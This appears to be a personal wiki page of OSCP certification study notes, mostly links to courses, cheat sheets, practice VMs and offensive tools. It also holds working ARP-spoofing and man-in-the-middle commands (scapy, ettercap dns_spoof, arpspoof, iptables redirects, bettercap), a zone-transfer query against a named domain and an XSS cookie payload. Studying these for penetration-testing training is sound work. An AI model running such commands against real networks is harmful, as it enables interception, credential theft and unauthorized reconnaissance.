Offensive Security Certified Professional (OSCP)

Offensive Security Certified Professional (OSCP) is an ethical hacking certification offered by Offensive Security that teaches penetration testing methodologies and the use of the tools included in the BackTrack penetration testing distribution (now succeeded by the Kali Linux distribution).[1][2] The OSCP certification consists of a hands-on exam that requires successfully attacking and penetrating several machines in a safe, controlled environment.[3] It is currently one of the few certifications that requires evidence of practical skills, in the form of a penetration test.

Preparation references

  • shi_ver_bot : A Telegram bot to see if your password was in the BreachCompilation

beef project

boca site: search for <script>alert(document.cookie)</script>

https://www.netcraft.com/

https://www.seleniumhq.org/

https://panopticlick.eff.org/

https://beefproject.com/

dig @200.111.157.67 unap.cl -t AXFR

https://www.acunetix.com/

https://github.com/1N3/Sn1per

port knocking

https://blog.wpscans.com/sniff-wordpress-login-credentials-wireshark-http-connection/

https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/
https://kali.training/lessons/introduction/

https://kali.training/topic/introduction-to-kali-linux/

https://www.offensive-security.com/information-security-certifications/oswe-offensive-security-web-expert/
https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/
https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/

https://smarterworkspaces.kyocera.es/blog/certificacion-seguridad-informatica-cuales-las-principales/

(ip.addr == 10.168.40.145) and (!udp contains "HTTP/1.1")

https://tools.kali.org/information-gathering/nmap

ip.src == 192.168.0.99 && tcp.flags.syn==1 && tcp.flags.ack==1

https://3.14.by/en/md5

https://github.com/alearea51/IKn0wU

https://github.com/TunisianEagles/SocialBox

https://github.com/gentilkiwi/mimikatz
https://github.com/AlessandroZ/LaZagne

https://github.com/reconSF/python/blob/master/Syngress.Violent.Python.a.Cookbook.for.Hackers.2013.pdf

https://github.com/vk496/linset

https://foro.seguridadwireless.net/manuales-de-wifislax-wifiway/manual-basico-de-wifislax-y-sus-herramientas-de-auditoria/

https://github.com/WifiPhisher

https://github.com/xtr4nge/FruityWifi

scapy

a = ARP(op="who-has", psrc="192.168.168.2", pdst="192.168.168.131", hwdst="fe80::4067:2e3f:d06:61bd")
send(a, inter=3, loop=1)

a = ARP(op="who-has", psrc="10.168.40.1", pdst="10.168.40.70", hwdst="fe80::4067:2e3f:d06:61bd")

10.168.40.1

IP to spoof, victim IP, victim MAC:
a = ARP(op="who-has", psrc="10.168.40.1", pdst="10.168.40.70", hwdst="08:00:27:52:2D:A0")

send(a, inter=3, loop=1)

ettercap

ettercap -T -q -i eth0 -P dns_spoof -M arp /10.168.40.145/// 

tcpdump -n -i wlan0 -e 'arp or icmp'

arping -c 1 -I wlan0 10.168.40.1
ARPING 10.168.40.1
60 bytes from 08:00:27:7e:b5:f7 (10.168.40.1): index=0 time=1.363 msec
60 bytes from 00:17:c5:15:81:6a (10.168.40.1): index=1 time=2.670 msec

--- 10.168.40.1 statistics ---

https://sandilands.info/sgordon/arp-spoofing-on-wired-lan

mitmproxy

arpspoof -i eth0 -t 10.168.40.70 10.168.40.1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080

mitmproxy --mode transparent

bettercap -T ipvictima --proxy -P

https://github.com/byt3bl33d3r/MITMf
https://backtrackacademy.com/articulo/saltando-hsts-con-man-in-the-middle-framework
http://www.elladodelmal.com/2016/03/ataques-man-in-middle-hsts-sslstrip-2.html

https://www.trustwave.com/Resources/SpiderLabs-Blog/Changes-in-Oracle-Database-12c-password-hashes/

w3af
http://exploitpack.com/


WIFI

https://github.com/xtr4nge/FruityC2


android https://github.com/M4sc3r4n0/Evil-Droid

extra

https://github.com/nixawk/pentest-wiki

https://geekflare.com/online-scan-website-security-vulnerabilities/

other

https://es.scribd.com/document/13213787/CUH-E-zine-4%C2%AA-Edicion

https://www.aircrack-ng.org/doku.php?id=es:aireplay-ng
https://www.aircrack-ng.org/doku.php?id=es:deauthentication

https://www.offensive-security.com/metasploit-unleashed/

https://blog.segu-info.com.ar/2018/09/examen-de-prueba-para-estudiantes-del.html
https://www.alienvault.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp

OSCP

https://www.sniferl4bs.com/2015/11/entrenando-en-casa-para-rendir-el-oscp.html
https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440
https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-2-workflow-and-documentation-tips-9dd335204a48
https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97

https://support.offensive-security.com/#!pwk-support.md
https://support.offensive-security.com/#!oscp-exam-guide.md

https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf
https://www.securitysift.com/offsec-pwb-oscp/
https://www.adampalmer.me/iodigitalsec/2013/04/11/offensive-security-pwb-course-and-oscp-certification-review/

https://vcatalan.com/2017/01/OSCP-part-I-preparacion-estudio-previo.html

https://mytcpip.com/2017/08/10/taller-de-hacking-i-nmap-a-fondo-metasploit-basico/
https://null-byte.wonderhowto.com/forum/upload-shell-from-phpmyadmin-xampp-by-mohamed-ahmed-0179931/

https://www.exam-labs.com/exam/NSE4#tutorial

https://www.ihacklabs.com/es/el-mejor-sistema-de-pivoting-en-linux/

https://wiki.wireshark.org/SampleCaptures

https://www.ubuntupit.com/an-ultimate-list-of-ethical-hacking-and-penetration-testing-tools-for-kali-linux/?fbclid=IwAR2szRvngTnDw8X7sETTlDH7letMnJriTBNSWYe_P4t49VVScqdxS2gWhV8

https://openwall.info/wiki/

https://github.com/ibr2/pwk-cheatsheet

https://www.keiththome.com/oscp-course-review/

http://fl3x.us/blog/2015/09/22/order-wireless-devices-for-wifu-course/

https://amonsec.net/course/offensive-security-pwk-course-review

https://blog.g0tmi1k.com/2013/08/cracking-perimeter-ctp-offensive/

https://www.ihacklabs.com/es/certificacion-osce-review-cracking-the-perimeter-ctp/

http://www.vividmachines.com/shellcode/shellcode.html

https://www.securitysift.com/offsec-ctp-osce/

https://hackforums.net/member.php

http://nixware.net/my-osce-journey

http://www.cs.virginia.edu/~evans/cs216/guides/x86.html

https://www.pentesteracademy.com/topics

https://openwall.info/wiki/p_lkrg/Main

https://github.com/tanc7/hacking-books

https://github.com/tanc7

https://infosecuritygeek.com/vulnhub-kioptrix-2014/

http://www.securitysift.com/offsec-pwb-oscp/

https://xapax.gitbooks.io/security/content/

https://medium.com/@bondo.mike/ptp-lab-privilege-escalation-with-services-5d14a99a28d1

https://github.com/xapax/oscp

https://medium.com/@m4lv0id/and-i-did-oscp-589babbfea19

Cupp, to create wordlists: git clone https://github.com/Mebus/cupp.git

Brute-force attacks against social networks: git clone https://github.com/TunisianEagles/SocialBox.git

Password dump (memory dump): https://github.com/AlessandroZ/LaZagne

Cracking WPA/WPA2 with phishing:
https://github.com/vk496/linset
https://github.com/wifiphisher/wifiphisher

instabridge

--mode transparent

mitm.it/cert/p12

bettercap -T [ip_victima] --proxy -P

Evil-Droid git clone https://github.com/M4sc3r4n0/Evil-Droid.git

https://www.giuspen.com/cherrytree/

https://github.com/mikaelkall/HackingAllTheThings

https://www.vortex.id.au/2017/05/oscp-exam-preparation-exam-day-report-day/

https://github.com/P3t3rp4rk3r/OSCP-cheat-sheet-1

https://github.com/so87/OSCP-PwK

https://medium.com/@chennylmf/hackthebox-lame-c28b19558cb0

https://github.com/OlivierLaflamme/Cheatsheet-God

https://medium.com/@cymtrick/oscp-cheat-sheet-5b8aeae085ad

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

https://medium.com/@chennylmf/hackthebox-walkthrough-tartarsauce-810a8df296c1

http://www.fuzzysecurity.com/tutorials/16.html

Good reviews of CTP/OSCE (in no particular order):

Note: * mark means look for other posts on this blog

Tutorial sites (more stars = better/recommended):

Cheatsheets:

Good practice sites:

Vulnerable machines: vulnhub VMs:

  • SickOS 1.1
  • SickOS 1.2
  • Droopy v0.2
  • Kevgir
  • Pegasus
  • SecTalks: BNE0x00 - Minotaur
  • SecTalks: BNE0x03 - Simple
  • NullByte: 1
  • FristiLeaks 1.3
  • OWASP Vulnerable Web Applications Directory Project
  • Mutillidae
  • Damn Vulnerable Web Application

LFI/RFI: https://penetrate.io/2014/01/10/from-rfi-to-shell/

Backdooring files with Python: https://github.com/secretsquirrel/the-backdoor-factory

eBooks downloads:
http://www.ebook777.com/gray-hat-hacking-ethical-hackers-handbook-fourth-edition/
https://github.com/JpGallegos/CySecBooks
https://www.securepla.net/the-hacker-playbook-2/
"Hacking: The Art of Exploitation"

https://www.linkedin.com/pulse/osce-cracking-perimeter-experience-sunny-neo

  • Fuzzing (Scapy, TAO, Sulley)
  • Linux Exploitation (vanilla stack overflow, return to Glibc - NX bypass, repairing stack canaries, ASLR bypasses) and Windows exploitation (SEH overwrite, Return Oriented Programming into disabling DEP)
  • Web Application Hacker's Handbook (might be too large: Consider "webgoat")

Various sites:
http://www.sweetscape.com/ (010 Editor)
https://github.com/campagnola/pycca
https://github.com/Gallopsled/pwntools
https://github.com/reyammer/shellnoob
https://zeltser.com/convert-shellcode-to-assembly/
http://files.cnblogs.com/files/exclm/ollydbg_cmdline_cheat_sheet.pdf
http://bernardodamele.blogspot.sg/2011/09/reverse-shells-one-liners.html
https://www.digitalocean.com/community/tutorials/how-to-use-bash-history-commands-and-expansions-on-a-linux-vps
https://github.com/peterferrie/win-exec-calc-shellcode
http://www.secniu.com/why-my-shellcode-cannot-work/
http://thestarman.pcministry.com/asm/2bytejumps.htm
http://blog.noobroot.com/
https://www.exploit-db.com/exploits/5342/
http://exploit.co.il/hacking/manual-egghuntershellcode-encoding/
https://github.com/salcho/codetz
http://xangosec.blogspot.sg/2014/08/automating-sub-encoder.html
http://www.fuzzing.org/
http://resources.infosecinstitute.com/pattern-based-approach-memory-shellcodes-detection/
https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/
https://0x41.no/hacking-networks-with-snmp/
http://danielebellavista.blogspot.sg/2014/10/ia32-shellcodes-get-eip-value.html
http://www.thepentesters.net/tutorials/tricks-escaping-linux-restricted-shells/
http://codemachine.com/downloads.html

Fun random stuff:
http://patriciopalladino.com/files/hieroglyphy/
http://n01g3l.tumblr.com/
https://twitter.com/ch3rn0byl/status/832681279900487680

https://blog.g0tmi1k.com/2012/02/kioptrix-level-4-sql-injection/

https://blog.g0tmi1k.com/2012/01/hackademic-rtb2/

https://github.com/vanhoefm/modwifi
https://github.com/vanhoefm/blackhat17-pocs

https://github.com/0x90/uberscapy

https://github.com/0x90/wifi-arsenal
https://github.com/0x90/kali-scripts

https://nets.ec/Main_Page
https://old.exploit-db.com/exploits/13284/

https://packetstormsecurity.com/files/90146/Ascii-To-Shellcode-Encoder-Decoder-Tool.html

https://underc0de.org/foro/hacking/que-es-una-shellcode/

https://0x00sec.org/t/linux-shellcoding-part-1-0/289

https://github.com/Grazfather/PracticalMalwareLabs
https://github.com/Grazfather/BlackHatPython

https://github.com/VulnHub/ctf-writeups

https://nullku7.github.io/stuff/vulnhub/walkthrough/2017/05/28/vulnhub-mr-robot.html

https://github.com/trustedsec

https://exploit.courses/#/challenges

https://payatu.com/guide-linux-privilege-escalation/

https://github.com/dobin/yookiterm-slides

https://exploit.courses/files/bfh2018/content.html

https://exploit.courses/files/bfh2017/content.html

https://systemoverlord.com/2017/10/24/building-a-home-lab-for-offensive-security-basics.html#pre-made-vms-tools

https://blog.vonhewitt.com/2018/08/oscp-exam-cram-log-aug-sept-oct-2018/

https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/

https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html

https://www.exploit-db.com/exploits/44298

https://github.com/jivoi/pentest

https://github.com/lucyoa/kernel-exploits

enlaces/seguridad/certificaciones/oscp.txt · Last modified: 2018/12/13 14:37 by cayu